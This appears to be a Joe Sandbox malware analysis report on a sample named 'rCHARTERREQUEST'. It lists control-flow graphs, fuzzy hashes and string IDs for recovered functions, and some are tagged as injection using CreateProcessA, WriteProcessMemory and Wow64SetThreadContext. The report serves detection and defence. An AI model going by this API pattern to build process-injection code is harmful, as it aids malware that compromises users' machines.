                                                                                                          control_flow_graph 2501 6b8c6b9-6b8c6f4 2503 6b8c6fd-6b8c710 call 6b8c348 2501->2503 2504 6b8c6f6 2501->2504 2507 6b8c854-6b8c85b 2503->2507 2508 6b8c716-6b8c729 2503->2508 2504->2503 2509 6b8c861-6b8c876 2507->2509 2510 6b8caf5-6b8cafc 2507->2510 2514 6b8c72b-6b8c732 2508->2514 2515 6b8c737-6b8c751 2508->2515 2524 6b8c878-6b8c87a 2509->2524 2525 6b8c896-6b8c89c 2509->2525 2512 6b8cb6b-6b8cb72 2510->2512 2513 6b8cafe-6b8cb07 2510->2513 2516 6b8cb78-6b8cb81 2512->2516 2517 6b8cc0e-6b8cc15 2512->2517 2513->2512 2519 6b8cb09-6b8cb1c 2513->2519 2520 6b8c84d 2514->2520 2537 6b8c758-6b8c765 2515->2537 2538 6b8c753-6b8c756 2515->2538 2516->2517 2521 6b8cb87-6b8cb9a 2516->2521 2522 6b8cc31-6b8cc37 2517->2522 2523 6b8cc17-6b8cc28 2517->2523 2519->2512 2533 6b8cb1e-6b8cb63 2519->2533 2520->2507 2546 6b8cb9c-6b8cbab 2521->2546 2547 6b8cbad-6b8cbb1 2521->2547 2526 6b8cc49-6b8cc52 2522->2526 2527 6b8cc39-6b8cc3f 2522->2527 2523->2522 2542 6b8cc2a 2523->2542 2524->2525 2531 6b8c87c-6b8c893 2524->2531 2528 6b8c8a2-6b8c8a4 2525->2528 2529 6b8c964-6b8c968 2525->2529 2534 6b8cc41-6b8cc47 2527->2534 2535 6b8cc55-6b8ccca 2527->2535 2528->2529 2536 6b8c8aa-6b8c90b 2528->2536 2529->2510 2539 6b8c96e-6b8c970 2529->2539 2531->2525 2533->2512 2574 6b8cb65-6b8cb68 2533->2574 2534->2526 2534->2535 2608 6b8ccd8 2535->2608 2609 6b8cccc-6b8ccd6 2535->2609 2589 6b8c913-6b8c92b 2536->2589 2544 6b8c767-6b8c77b 2537->2544 2538->2544 2539->2510 2545 6b8c976-6b8c97f 2539->2545 2542->2522 2544->2520 2573 6b8c781-6b8c7d5 2544->2573 2554 6b8cad2-6b8cad8 2545->2554 2546->2547 2548 6b8cbd1-6b8cbd3 2547->2548 2549 6b8cbb3-6b8cbb5 2547->2549 2548->2517 2556 6b8cbd5-6b8cbdb 2548->2556 2549->2548 2555 6b8cbb7-6b8cbce 2549->2555 2557 6b8cada-6b8cae9 2554->2557 2558 6b8caeb 2554->2558 2555->2548 2556->2517 2562 6b8cbdd-6b8cc0b 2556->2562 2565 6b8caed-6b8caef 2557->2565 2558->2565 2562->2517 2565->2510 2567 6b8c984-6b8c992 2565->2567 2580 6b8c9aa-6b8c9c4 2567->2580 2581 6b8c994-6b8c99a 2567->2581 2611 6b8c7e3-6b8c7e7 2573->2611 2612 6b8c7d7-6b8c7d9 2573->2612 2574->2512 2580->2554 2588 6b8c9ca-6b8c9ce 2580->2588 2582 6b8c99c 2581->2582 2583 6b8c99e-6b8c9a0 2581->2583 2582->2580 2583->2580 2592 6b8c9ef 2588->2592 2593 6b8c9d0-6b8c9d9 2588->2593 2601 6b8c92d-6b8c93f 2589->2601 2602 6b8c942-6b8c961 2589->2602 2596 6b8c9f2-6b8ca0c 2592->2596 2594 6b8c9db-6b8c9de 2593->2594 2595 6b8c9e0-6b8c9e3 2593->2595 2600 6b8c9ed 2594->2600 2595->2600 2596->2554 2613 6b8ca12-6b8ca93 2596->2613 2600->2596 2601->2602 2602->2529 2614 6b8ccdd-6b8ccdf 2608->2614 2609->2614 2611->2520 2615 6b8c7e9-6b8c801 2611->2615 2612->2611 2637 6b8caaa-6b8cad0 2613->2637 2638 6b8ca95-6b8caa7 2613->2638 2616 6b8cce1-6b8cce4 2614->2616 2617 6b8cce6-6b8cceb 2614->2617 2615->2520 2621 6b8c803-6b8c80f 2615->2621 2619 6b8ccf1-6b8cd1e 2616->2619 2617->2619 2622 6b8c81e-6b8c824 2621->2622 2623 6b8c811-6b8c814 2621->2623 2626 6b8c82c-6b8c835 2622->2626 2627 6b8c826-6b8c829 2622->2627 2623->2622 2629 6b8c844-6b8c84a 2626->2629 2630 6b8c837-6b8c83a 2626->2630 2627->2626 2629->2520 2630->2629 2637->2510 2637->2554 2638->2637
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: 30f9bf62d21a7b39e4b5fc079b8175f0c2638a4d7eb5da66451705002c275abf
                                                                                                          • Instruction ID: 8b8af1e70c402c55a8cbcaf7ba29817047240a408c79f4e7dfb7c70e726ef836
                                                                                                          • Opcode Fuzzy Hash: 30f9bf62d21a7b39e4b5fc079b8175f0c2638a4d7eb5da66451705002c275abf
                                                                                                          • Instruction Fuzzy Hash: F112ADB4E006198FCB55DFA5D854AADBBF2FF88300F148095E811AB394DB789D85CFA0
                                                                                                          Function 06B8F800 Relevance: 2.8, Strings: 2, Instructions: 343COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2641 6b8f800-6b8f812 2642 6b8f83c-6b8f840 2641->2642 2643 6b8f814-6b8f835 2641->2643 2644 6b8f84c-6b8f85b 2642->2644 2645 6b8f842-6b8f844 2642->2645 2643->2642 2646 6b8f85d 2644->2646 2647 6b8f867-6b8f893 2644->2647 2645->2644 2646->2647 2651 6b8f899-6b8f89f 2647->2651 2652 6b8fac0-6b8fb07 2647->2652 2653 6b8f971-6b8f975 2651->2653 2654 6b8f8a5-6b8f8ab 2651->2654 2683 6b8fb09 2652->2683 2684 6b8fb1d-6b8fb29 2652->2684 2657 6b8f998-6b8f9a1 2653->2657 2658 6b8f977-6b8f980 2653->2658 2654->2652 2656 6b8f8b1-6b8f8be 2654->2656 2660 6b8f950-6b8f959 2656->2660 2661 6b8f8c4-6b8f8cd 2656->2661 2663 6b8f9a3-6b8f9c3 2657->2663 2664 6b8f9c6-6b8f9c9 2657->2664 2658->2652 2662 6b8f986-6b8f996 2658->2662 2660->2652 2667 6b8f95f-6b8f96b 2660->2667 2661->2652 2668 6b8f8d3-6b8f8eb 2661->2668 2666 6b8f9cc-6b8f9d2 2662->2666 2663->2664 2664->2666 2666->2652 2669 6b8f9d8-6b8f9eb 2666->2669 2667->2653 2667->2654 2670 6b8f8ed 2668->2670 2671 6b8f8f7-6b8f909 2668->2671 2669->2652 2674 6b8f9f1-6b8fa01 2669->2674 2670->2671 2671->2660 2680 6b8f90b-6b8f911 2671->2680 2674->2652 2676 6b8fa07-6b8fa14 2674->2676 2676->2652 2679 6b8fa1a-6b8fa2f 2676->2679 2679->2652 2692 6b8fa35-6b8fa58 2679->2692 2681 6b8f91d-6b8f923 2680->2681 2682 6b8f913 2680->2682 2681->2652 2685 6b8f929-6b8f94d 2681->2685 2682->2681 2686 6b8fb0c-6b8fb0e 2683->2686 2688 6b8fb2b 2684->2688 2689 6b8fb35-6b8fb51 2684->2689 2690 6b8fb10-6b8fb1b 2686->2690 2691 6b8fb52-6b8fb7f 2686->2691 2688->2689 2690->2684 2690->2686 2702 6b8fb81-6b8fb87 2691->2702 2703 6b8fb97-6b8fb9b call 6d410da 2691->2703 2692->2652 2697 6b8fa5a-6b8fa65 2692->2697 2700 6b8fab6-6b8fabd 2697->2700 2701 6b8fa67-6b8fa71 2697->2701 2701->2700 2707 6b8fa73-6b8fa89 2701->2707 2704 6b8fb89 2702->2704 2705 6b8fb8b-6b8fb8d 2702->2705 2708 6b8fba1-6b8fba5 2703->2708 2704->2703 2705->2703 2712 6b8fa8b 2707->2712 2713 6b8fa95-6b8faae 2707->2713 2709 6b8fbf0-6b8fc00 2708->2709 2710 6b8fba7-6b8fbbe 2708->2710 2710->2709 2718 6b8fbc0-6b8fbca 2710->2718 2712->2713 2713->2700 2721 6b8fbcc-6b8fbdb 2718->2721 2722 6b8fbdd-6b8fbed 2718->2722 2721->2722
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$d
                                                                                                          • API String ID: 0-3334038649
                                                                                                          • Opcode ID: 7a090d2d060ad26caa2f17919eee63f616760790b7550191ac0f7042a2395e81
                                                                                                          • Instruction ID: 406d1c9cf6a7d884f9c91bbe4cefc5df19fe4e7672b6f0d0dc984789ad22889c
                                                                                                          • Opcode Fuzzy Hash: 7a090d2d060ad26caa2f17919eee63f616760790b7550191ac0f7042a2395e81
                                                                                                          • Instruction Fuzzy Hash: 2AD17C70600606CFCB54DF29C49496AB7FAFF88350B2AC9A9D45A9B365DB30FC45CB90
                                                                                                          Function 06D40C81 Relevance: 2.8, Strings: 2, Instructions: 330COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2727 6d40c81-6d40cb7 2729 6d40d05-6d40d1f 2727->2729 2730 6d40cb9-6d40cbb 2727->2730 2744 6d40d21-6d40d27 2729->2744 2745 6d40d29-6d40d38 2729->2745 2731 6d40cd7-6d40cdb 2730->2731 2732 6d40cbd-6d40cc7 2730->2732 2736 6d40cdd-6d40ce3 2731->2736 2737 6d40cff-6d40d03 2731->2737 2734 6d40fe7-6d4100b 2732->2734 2735 6d40ccd-6d40cd1 2732->2735 2750 6d4100d-6d41019 2734->2750 2735->2731 2739 6d40e55-6d40e58 2735->2739 2736->2734 2738 6d40ce9-6d40cf6 2736->2738 2737->2729 2737->2730 2738->2737 2747 6d40cf8 2738->2747 2739->2734 2740 6d40e5e-6d40ed6 2739->2740 2759 6d40edd-6d40f25 2740->2759 2749 6d40d3e-6d40d77 2744->2749 2745->2749 2745->2759 2747->2737 2778 6d40d87-6d40d9c 2749->2778 2779 6d40d79-6d40d80 2749->2779 2751 6d41079-6d4107d 2750->2751 2752 6d4101b-6d41021 2750->2752 2751->2750 2755 6d4107f-6d41086 2751->2755 2757 6d41087-6d410a3 2752->2757 2758 6d41023-6d4102a 2752->2758 2773 6d410ac-6d410ad 2757->2773 2758->2757 2760 6d4102c-6d41032 2758->2760 2791 6d40f2c-6d40f62 2759->2791 2765 6d41034-6d4103f 2760->2765 2766 6d41073-6d41077 2760->2766 2765->2757 2767 6d41041-6d4104b 2765->2767 2766->2751 2766->2752 2767->2757 2769 6d4104d-6d4106c 2767->2769 2769->2766 2790 6d40da2-6d40dc3 2778->2790 2778->2791 2779->2778 2783 6d40d82-6d40d84 2779->2783 2783->2778 2797 6d40df4-6d40e04 2790->2797 2798 6d40dc5-6d40dd2 2790->2798 2809 6d40f69-6d40f8d 2791->2809 2804 6d40e06-6d40e26 2797->2804 2805 6d40e28 2797->2805 2802 6d40dd4-6d40de0 2798->2802 2803 6d40de2 2798->2803 2808 6d40de7-6d40dea 2802->2808 2803->2808 2807 6d40e2a-6d40e3f 2804->2807 2805->2807 2810 6d40e41-6d40e45 2807->2810 2811 6d40e4b-6d40e52 2807->2811 2808->2809 2812 6d40df0 2808->2812 2814 6d40f94-6d40fe0 2809->2814 2810->2811 2810->2814 2812->2797 2814->2734
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Hbq$Hbq
                                                                                                          • API String ID: 0-4258043069
                                                                                                          • Opcode ID: 6e31cd9b95c2dc4586793656d99ae6509adf0eae65883476be008e775938c792
                                                                                                          • Instruction ID: 911c407de8908622fd047ace4b1593735f39349e704be44930122a0244f72bd3
                                                                                                          • Opcode Fuzzy Hash: 6e31cd9b95c2dc4586793656d99ae6509adf0eae65883476be008e775938c792
                                                                                                          • Instruction Fuzzy Hash: C1C1D030600515DFCB54EF69C480AAEBBF2FF88304F158569E9099B3A5CB34ED46CB95
                                                                                                          Function 06B451A8 Relevance: 2.7, Strings: 2, Instructions: 208COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1932794004.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 4'^q$4'^q
                                                                                                          • API String ID: 0-2697143702
                                                                                                          • Opcode ID: e37d0f416ddb1bb9cc501b84e2eddaaa6e448ee528f0e5c7f3c46f93394ea8a8
                                                                                                          • Instruction ID: 07ec4b098ff233cfc36ee82cfd64314d1c1d89df4c925aca963dc0de9b14749d
                                                                                                          • Opcode Fuzzy Hash: e37d0f416ddb1bb9cc501b84e2eddaaa6e448ee528f0e5c7f3c46f93394ea8a8
                                                                                                          • Instruction Fuzzy Hash: A391A272E00208CFCBA5EFA9D4546ECB7B2FF89201F14906AD426BB354DB745845DF60
                                                                                                          Function 06B8E230 Relevance: 2.7, Strings: 2, Instructions: 190COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$(bq
                                                                                                          • API String ID: 0-4224401849
                                                                                                          • Opcode ID: 3a1e9b45fd2ec300ce86362a3661fd90fdc80e19aa6a40b1f5dfef9a229125a8
                                                                                                          • Instruction ID: 9a384243cd6b8e445b8cdd675e4c6a10a3772640e49f6169d5c5344c9af44b29
                                                                                                          • Opcode Fuzzy Hash: 3a1e9b45fd2ec300ce86362a3661fd90fdc80e19aa6a40b1f5dfef9a229125a8
                                                                                                          • Instruction Fuzzy Hash: 9751D3317002159FCB55AF69D850AAE7BA6FFC4341F1481A9E806CB3A1CF39DC46CB91
                                                                                                          Function 06D3C2B1 Relevance: 2.6, Strings: 2, Instructions: 148COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934546099.0000000006D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D30000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d30000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$Hbq
                                                                                                          • API String ID: 0-4081012451
                                                                                                          • Opcode ID: 2370da6f6a388114d542caa9af47cd5b3c9559925ba7a2eaf3ce373a09ff2740
                                                                                                          • Instruction ID: 2f53627349f548c110010cbf5a3b9cdfab1203774ad395ce5f935118278ddc99
                                                                                                          • Opcode Fuzzy Hash: 2370da6f6a388114d542caa9af47cd5b3c9559925ba7a2eaf3ce373a09ff2740
                                                                                                          • Instruction Fuzzy Hash: 2451E2312147508FD3659F3AC45035BBBF2EF85310F148A6AE4968B7E1DB78E849CBA1
                                                                                                          Function 06D4792F Relevance: 2.6, Strings: 2, Instructions: 98COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (bq$Hbq
                                                                                                          • API String ID: 0-4081012451
                                                                                                          • Opcode ID: f98959749ed02e6c6204fec6a4a5e362a4dd4d8ea27e462dd99113fecca8cc06
                                                                                                          • Instruction ID: 8ad065f60fb967a711697c3219c4255986c7cd353b83788821fa8f2d7acc343c
                                                                                                          • Opcode Fuzzy Hash: f98959749ed02e6c6204fec6a4a5e362a4dd4d8ea27e462dd99113fecca8cc06
                                                                                                          • Instruction Fuzzy Hash: 103136317092845FC346EB79D8104AE7FE6EFC620071142BAE446CB3A2DF349E0587A2
                                                                                                          Function 06B87622 Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0$2
                                                                                                          • API String ID: 0-3793063076
                                                                                                          • Opcode ID: 061a39f5b66dc580c796904be5e28e0a4d56103bf040882b0adf0394f4e3fea9
                                                                                                          • Instruction ID: c4b6199f2ae7bf06fd5990e9899ed095c314466b8503101341b0d20bb80614ed
                                                                                                          • Opcode Fuzzy Hash: 061a39f5b66dc580c796904be5e28e0a4d56103bf040882b0adf0394f4e3fea9
                                                                                                          • Instruction Fuzzy Hash: E72193B091521CDFEB90DF68D884B9DBBF1FB06308F2091A5E809A7255DB789989CF41
                                                                                                          Function 06D42FE0 Relevance: 1.9, Strings: 1, Instructions: 677COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934615546.0000000006D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D40000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d40000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: ,bq
                                                                                                          • API String ID: 0-2474004448
                                                                                                          • Opcode ID: 27542d9cfa43acabf2f3ae2542a30a94b2fc3d435afa2cbf6977558659224912
                                                                                                          • Instruction ID: 7dc2bf06e8039e3283ce9395d00864e0d4c00ce736c4630f6f7f5475c7471466
                                                                                                          • Opcode Fuzzy Hash: 27542d9cfa43acabf2f3ae2542a30a94b2fc3d435afa2cbf6977558659224912
                                                                                                          • Instruction Fuzzy Hash: 46520675A002288FDB64DF69C981BEDBBF2BF88300F1541D9E549AB351DA319E81CF61
                                                                                                          Function 06B8D240 Relevance: 1.8, Strings: 1, Instructions: 531COMMON
                                                                                                          Download Yara Rule
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1933005482.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6b80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: (_^q
                                                                                                          • API String ID: 0-538443824
                                                                                                          • Opcode ID: 29ffc7119a30efae55620e451b399a6e920b55666f5d45a7560ccd0614bee289
                                                                                                          • Instruction ID: 4b35e459f08d856787b2ddd05064ad39849ef1c67fc05e12f520c2383ac96430
                                                                                                          • Opcode Fuzzy Hash: 29ffc7119a30efae55620e451b399a6e920b55666f5d45a7560ccd0614bee289
                                                                                                          • Instruction Fuzzy Hash: 57227F75A002059FDB54DFA9D494AADB7F2FF88304F1580AAE905EB391DB75EC80CB90
                                                                                                          Function 06439306 Relevance: 1.7, APIs: 1, Instructions: 207processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064394EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 7a1a63d590289409bc563e4fdd52f2647e3e7ca560808ab6f1b493299ee3b25d
                                                                                                          • Instruction ID: 9694dedc9939f6cfc4df375bd08b5974cdbe054f74dca12e6e6a88e278e0257f
                                                                                                          • Opcode Fuzzy Hash: 7a1a63d590289409bc563e4fdd52f2647e3e7ca560808ab6f1b493299ee3b25d
                                                                                                          • Instruction Fuzzy Hash: DC812AB1D002199FDB51CFA9C9817AEBBF1BF48310F14852AE869E7384E7749881CF81
                                                                                                          Function 06439310 Relevance: 1.7, APIs: 1, Instructions: 201processCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 064394EA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 963392458-0
                                                                                                          • Opcode ID: 06a7090d298b36b8f431ed9e1ec082ba34544469163cc8003f10c3bc88b7afe8
                                                                                                          • Instruction ID: e8f874051af0ed5f5146a3ac1a3db42d0f765fee15f112aae81d55e1cbb26efd
                                                                                                          • Opcode Fuzzy Hash: 06a7090d298b36b8f431ed9e1ec082ba34544469163cc8003f10c3bc88b7afe8
                                                                                                          • Instruction Fuzzy Hash: FC8119B1D042299FDB51CFA9C98579EBBF1BF48310F14852AE859E7384E7B49881CF81
                                                                                                          Function 06D8DE2C Relevance: 1.6, APIs: 1, Instructions: 147fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CopyFileA.KERNEL32(?,?,?), ref: 06D8DF7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CopyFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 1304948518-0
                                                                                                          • Opcode ID: e5dbb96b261f609879318e6b928e11a3f777dfc8a8e83e99d96bf89625ac5179
                                                                                                          • Instruction ID: 0d77f694abf315cc18bc3b3c003cf9770a85e2ad1b9066080e21fcf824c17128
                                                                                                          • Opcode Fuzzy Hash: e5dbb96b261f609879318e6b928e11a3f777dfc8a8e83e99d96bf89625ac5179
                                                                                                          • Instruction Fuzzy Hash: 9C516970D002599FDB61EFA9C8497AEBBF2BF48310F148529E859E7284DB749881CB81
                                                                                                          Function 06D8DE38 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CopyFileA.KERNEL32(?,?,?), ref: 06D8DF7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1934788263.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6d80000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CopyFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 1304948518-0
                                                                                                          • Opcode ID: aa3279b8ff1029760b1dbda71ed82c3f23b791a3db91157ee5d7a9d44366d7e4
                                                                                                          • Instruction ID: c6bb8f30cd58171c0250b88dd3efe25728a9cf47c9829f941c2d1a97a08bbd85
                                                                                                          • Opcode Fuzzy Hash: aa3279b8ff1029760b1dbda71ed82c3f23b791a3db91157ee5d7a9d44366d7e4
                                                                                                          • Instruction Fuzzy Hash: 44517AB0D003599FDB50EFA9C8497AEBBF2BF48310F148529E859E72C4DB749881CB81
                                                                                                          Function 0643B7C2 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0643B858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: aa1debe6ae127d3fb7b22f1d39b023aba64990c330a877f408e9068e3951b2ef
                                                                                                          • Instruction ID: 00b55c516010d0ac699e2a42ef20895b2b0bbb8976722ba45ea333455a3f5355
                                                                                                          • Opcode Fuzzy Hash: aa1debe6ae127d3fb7b22f1d39b023aba64990c330a877f408e9068e3951b2ef
                                                                                                          • Instruction Fuzzy Hash: D42128B19003599FCB10CFAAC985BDEBBF5FF48310F10842AE958A7250D7749944CBA4
                                                                                                          Function 0643B7C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 0643B858
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: MemoryProcessWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3559483778-0
                                                                                                          • Opcode ID: 872e126d327762e12135cb62e5f97f94d8bd4e3c8c348a82d2121f6969a424c7
                                                                                                          • Instruction ID: f6e8010898c1d435102c10170b3c24564de85c0ccaf59a5d1afaedfac13e3628
                                                                                                          • Opcode Fuzzy Hash: 872e126d327762e12135cb62e5f97f94d8bd4e3c8c348a82d2121f6969a424c7
                                                                                                          • Instruction Fuzzy Hash: 982127B1D003599FCB10CFA9C985BEEBBF5FF48310F10842AE958A7250D7789944CBA4
                                                                                                          Function 0643AFB0 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0643B036
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 54e1f7418be443d49383c5f7f645b47838dbb17b4f66417dfbabcbb99d9b7b4e
                                                                                                          • Instruction ID: 5ed057b11ae0c925d1164715621a68151a1984ba6ec0817f37e259e236fd692f
                                                                                                          • Opcode Fuzzy Hash: 54e1f7418be443d49383c5f7f645b47838dbb17b4f66417dfbabcbb99d9b7b4e
                                                                                                          • Instruction Fuzzy Hash: D72136719002198FCB10DFAAC5857AEFBF4EF49310F14842AD469A7241C7789585CFA4
                                                                                                          Function 0643AFB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0643B036
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1931040088.0000000006430000.00000040.00000800.00020000.00000000.sdmp, Offset: 06430000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_6430000_rCHARTERREQUEST.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ContextThreadWow64
                                                                                                          • String ID:
                                                                                                          • API String ID: 983334009-0
                                                                                                          • Opcode ID: 99582b96af3a85fe05adb7c120822901be132f711310550c942bb71487aae3ea
                                                                                                          • Instruction ID: 3ad7839252b8f3946b15ef3e5c8a61967dd64df35f0ca1fd68b2758672a5db6c
                                                                                                          • Opcode Fuzzy Hash: 99582b96af3a85fe05adb7c120822901be132f711310550c942bb71487aae3ea
                                                                                                          • Instruction Fuzzy Hash: 482137B1D003198FDB10DFAAC5857EEBBF4EB49324F10842AD469A7241C778A944CFA4
